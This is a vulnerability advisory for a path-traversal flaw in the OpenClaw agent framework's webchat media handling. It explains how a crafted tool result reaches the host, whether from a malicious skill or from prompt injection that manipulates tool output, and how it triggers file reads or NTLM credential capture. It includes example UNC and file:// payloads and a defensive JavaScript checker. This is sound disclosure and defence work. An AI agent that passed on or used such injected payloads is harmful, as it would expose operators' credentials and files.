GHSA-mr34-9552-qr95: openclaw: path traversal leaks files and NTLM credentials

GHSA-mr34-9552-qr95 HIGH
Published April 17, 2026
CISO Take

OpenClaw's webchat component fails to enforce local-root containment on tool-result media paths, allowing a crafted media reference to trigger host-side file reads or Windows UNC/NTLM credential leakage before any output is rendered to the user. With 4 downstream dependents and 135 prior CVEs in the same package, OpenClaw has a documented pattern of security issues that warrants heightened scrutiny in any agentic deployment. No public exploit or CISA KEV listing exists yet, but Windows deployments face elevated risk: UNC path injection triggering NTLM credential capture is low-friction and high-impact, requiring zero user interaction once the crafted tool result reaches the media normalization code. Upgrade openclaw to 2026.4.15 immediately; if patching is blocked, enforce outbound SMB blocking (TCP 445) on Windows hosts and disable webchat media embedding at the application layer until the patch is applied.

Sources: GitHub Advisory, ATLAS

What is the risk?

Medium risk overall, elevated to high for Windows deployments. Exploitation requires a crafted tool-result media path to reach the webchat media normalization pipeline — an indirect but realistic path in agentic workflows where tool outputs are forwarded to webchat rendering without sanitization. The pre-patch absence of assertLocalMediaAllowed enforcement means the containment bypass is reliable once the attack path is reached. On Windows, UNC-triggered NTLM credential capture requires no user interaction on the host and yields authentication material reusable across the network. Non-Windows deployments face bounded file disclosure limited to the process's filesystem permissions, which is less severe but still a meaningful data leakage risk in multi-tenant or sensitive environments.

How does the attack unfold?

  1. Malicious Tool Result Injection (AML.T0053): Adversary delivers a crafted media reference containing a local path or Windows UNC path as part of a tool's return value, via a compromised third-party skill, a malicious ClawHub-sourced skill, or a prompt injection that manipulates tool output.

  2. Containment Bypass (AML.T0049): OpenClaw's webchat media normalization receives the tool result and forwards the unsanitized path to the host-side media embedding pipeline, bypassing the configured localRoots containment policy due to missing assertLocalMediaAllowed enforcement.

  3. Host-Side File or Network Access (AML.T0037): The host performs a filesystem stat or read for local file:// URIs, or initiates an outbound SMB connection for UNC paths (e.g., \\attacker.com\share), triggering NTLM credential negotiation on Windows or sensitive file access on any OS.

  4. Credential or File Exfiltration (AML.T0086): Host NTLM credential hashes are captured by the adversary's server via the SMB handshake, or sensitive local files are read and exfiltrated, all occurring host-side before the user sees any rendered webchat output.

What systems are affected?

Package    Ecosystem    Vulnerable Range            Patched
OpenClaw   npm          >= 2026.4.7, < 2026.4.15    2026.4.15

4 dependents, 36% patched, ~3d to patch

How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Moderate

What should I do?

  1. Upgrade openclaw to >=2026.4.15 immediately — this is the only complete fix, hardening both chat-webchat-media.ts and web-media.ts with safe file-URL parsing and assertLocalMediaAllowed enforcement.

  2. If patching is delayed, disable webchat media embedding features entirely at the application layer.

  3. On Windows, enforce outbound SMB blocking (TCP 445) at the host firewall and network perimeter to prevent UNC-triggered NTLM leakage to external servers.

  4. Audit outbound network logs for unexpected SMB connections originating from the OpenClaw process, and review filesystem access logs for anomalous reads outside expected media directories.

  5. Audit third-party skills installed from ClawHub or other registries for crafted media paths in tool return values, given the documented malicious skill ecosystem around OpenClaw (AIID #1368).

How is it classified?

Which compliance frameworks are affected?

This advisory is relevant to:

ISO 42001
A.6.2.6 - AI system security and resilience
NIST AI RMF
MEASURE 2.6 - AI risk measurement and monitoring
OWASP LLM Top 10
LLM02 - Insecure Output Handling
LLM07 - Insecure Plugin Design

Frequently Asked Questions

Is GHSA-mr34-9552-qr95 actively exploited?

No confirmed active exploitation of GHSA-mr34-9552-qr95 has been reported, but organizations should still patch proactively.

What systems are affected by GHSA-mr34-9552-qr95?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI chat and webchat interfaces, local AI deployment environments, Windows-hosted AI agent deployments.

What is the CVSS score for GHSA-mr34-9552-qr95?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworks, AI chat and webchat interfaces, local AI deployment environments, Windows-hosted AI agent deployments

MITRE ATLAS Techniques

AML.T0037 Data from Local System
AML.T0049 Exploit Public-Facing Application
AML.T0053 AI Agent Tool Invocation
AML.T0086 Exfiltration via AI Agent Tool Invocation

Compliance Controls Affected

ISO 42001: A.6.2.6
NIST AI RMF: MEASURE 2.6
OWASP LLM Top 10: LLM02, LLM07

What are the technical details?

Original Advisory

## Summary

Webchat tool-result media normalization could pass local and UNC-style file paths into the host-side media embedding path without applying the configured local-root containment policy.

## Impact

A crafted tool-result media reference could cause the host to attempt local file reads or Windows UNC/network path access while preparing webchat media blocks. This could disclose allowed host files or trigger network credential exposure on affected Windows deployments. Severity remains medium because exploitation depends on a tool-result media path reaching the webchat embedding path, but the sink is a host-side file read before the user sees the rendered result.

## Affected versions

- Affected: `>= 2026.4.7, < 2026.4.15`
- Patched: `2026.4.15`

## Fix

OpenClaw `2026.4.15` hardens the webchat media path and the shared media resolver. Remote-host `file://` URLs and Windows network paths are rejected before filesystem access, and audio embedding now enforces configured `localRoots` containment before `stat` or read operations.

Verified in `v2026.4.15`:

- `src/gateway/server-methods/chat-webchat-media.ts` uses safe file-URL parsing, rejects Windows network paths, and calls `assertLocalMediaAllowed` before probing local audio files.
- `src/media/web-media.ts` rejects remote-host `file://` URLs, Windows network paths, and local-root bypasses on the shared media path.
- `src/gateway/server-methods/chat-webchat-media.test.ts` covers both remote-host `file://` rejection and local-root denial before filesystem access.

Fix commits included in `v2026.4.15` and absent from `v2026.4.14`:

- `1470de5d3e0970856d86cd99336bb8ada3fe87da` via PR #67293
- `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde` via PR #67298
- `52ef42302ead9e183e6c8810e0a04ee4ef8ae9fc` via PR #67303 as defense-in-depth for trusted media passthrough anchoring

Thanks to @Kherrisan for reporting this issue.
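The order of checks the advisory attributes to the fix (reject remote-host `file://` URLs and Windows network paths, then enforce `localRoots` containment, all before any `stat` or read), sketched as an added example that is not OpenClaw's code. `checkMediaRef`, `normalizePosix`, the POSIX-only path handling and the sample root are assumptions made for illustration.

```javascript
// Added example: hypothetical checker, not OpenClaw's assertLocalMediaAllowed.
// Assumes POSIX absolute paths; roots and sample references are constructed.

// Lexically collapse "." and ".." segments of an absolute POSIX path.
function normalizePosix(p) {
  const out = [];
  for (const seg of p.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') out.pop();
    else out.push(seg);
  }
  return '/' + out.join('/');
}

// Pure string logic, so it can run before any stat/read: on Windows the
// probe of a network path is itself what opens the outbound SMB connection.
function checkMediaRef(ref, localRoots) {
  const deny = (reason) => ({ ok: false, reason });
  let p = ref;
  if (/^file:/i.test(ref)) {
    let u;
    try { u = new URL(ref); } catch { return deny('bad-url'); }
    // file://host/... names a remote host; only an empty host or localhost is local.
    if (u.hostname !== '' && u.hostname !== 'localhost') return deny('remote-file-url');
    try { p = decodeURIComponent(u.pathname); } catch { return deny('bad-url'); }
  }
  // \\host\share or //host/share, tested on raw input and on decoded URL paths.
  if (/^[\\/]{2}/.test(p)) return deny('network-path');
  if (!p.startsWith('/')) return deny('not-absolute');

  const resolved = normalizePosix(p);
  // Match on root + "/" so /srv/openclaw/media-old is not inside /srv/openclaw/media.
  const inside = localRoots.some((root) => {
    const r = normalizePosix(root);
    return resolved === r || resolved.startsWith(r === '/' ? r : r + '/');
  });
  // Production code must also resolve symlinks (realpath) on an accepted path
  // and re-check containment; this lexical pass cannot see them.
  return inside ? { ok: true, path: resolved } : deny('outside-local-roots');
}

const ROOTS = ['/srv/openclaw/media']; // constructed localRoots value
console.log(checkMediaRef('file:///srv/openclaw/media/clips/a.wav', ROOTS));
console.log(checkMediaRef('\\\\fileserver.example\\share\\a.wav', ROOTS));
console.log(checkMediaRef('file:///srv/openclaw/media/..%2F..%2Fsecrets.env', ROOTS));
```

The percent-encoded case is the one a naive check misses: the URL parser leaves `%2F` alone, so traversal only appears after decoding, which is why normalization runs on the decoded path.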

Exploitation Scenario

An adversary controlling a tool's output — via a compromised third-party skill, a prompt injection that manipulates tool return values, or a malicious tool published to ClawHub — embeds a Windows UNC path such as \\attacker-controlled-server\capture in the media field of a tool result. When the OpenClaw host processes this result through the webchat media normalization pipeline, it reaches the media embedding code in chat-webchat-media.ts without the patched assertLocalMediaAllowed guard. The host initiates an outbound SMB connection to resolve the UNC path, triggering an NTLM authentication challenge that exposes the machine's credential hash to the adversary running Responder or a similar capture tool. On non-Windows systems, the adversary substitutes a local file URI (e.g., file:///etc/passwd or file:///home/user/.env) to exfiltrate configuration secrets before the user sees any webchat output.

Weaknesses (CWE)

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.

Timeline

Published: April 17, 2026
Last Modified: April 17, 2026
First Seen: April 18, 2026

Related Vulnerabilities